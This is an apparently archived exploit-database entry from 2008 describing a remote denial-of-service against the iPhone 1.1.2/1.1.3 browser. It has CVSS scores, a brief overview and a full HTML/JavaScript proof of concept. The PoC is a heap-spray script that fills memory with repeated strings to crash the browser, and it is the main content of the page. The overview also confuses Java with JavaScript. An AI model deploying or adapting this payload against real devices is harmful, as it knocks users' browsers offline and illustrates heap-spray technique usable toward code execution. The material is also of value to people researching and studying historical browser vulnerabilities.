Apple iPhone 1.1.3 remote DoS exploit

2008.02.12
Credit: Joshua Morin
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.1/10
Impact Subscore: 6.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

Vendor: Apple Version affected: 1.1.2 and 1.1.3 Overview:The Apple iPhone remote DoS for 1.1.2 was discovered by c0ntex, but it actually works on 1.1.3 as well. After further research it also appears that this was a known issue with Firefox version 1.5.04 and was effected cross-platform. Called Mozilla Firefox JavaScript navigator Object Vulnerability.I recommend you disable Java until Apple releases a fix or patch. ___________________________________ Proof of Concept (PoC): <html><body><script> function Demo() { var shellcode; var addr; var fill; alert('attempting a crash!'); shellcode = unescape('%u0c0c'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length <= 0x40000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } } </script> <input type='button' onClick='Demo()' value='Go!'> </body></html> _________________________________________ Discovered by Joshua Morin


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top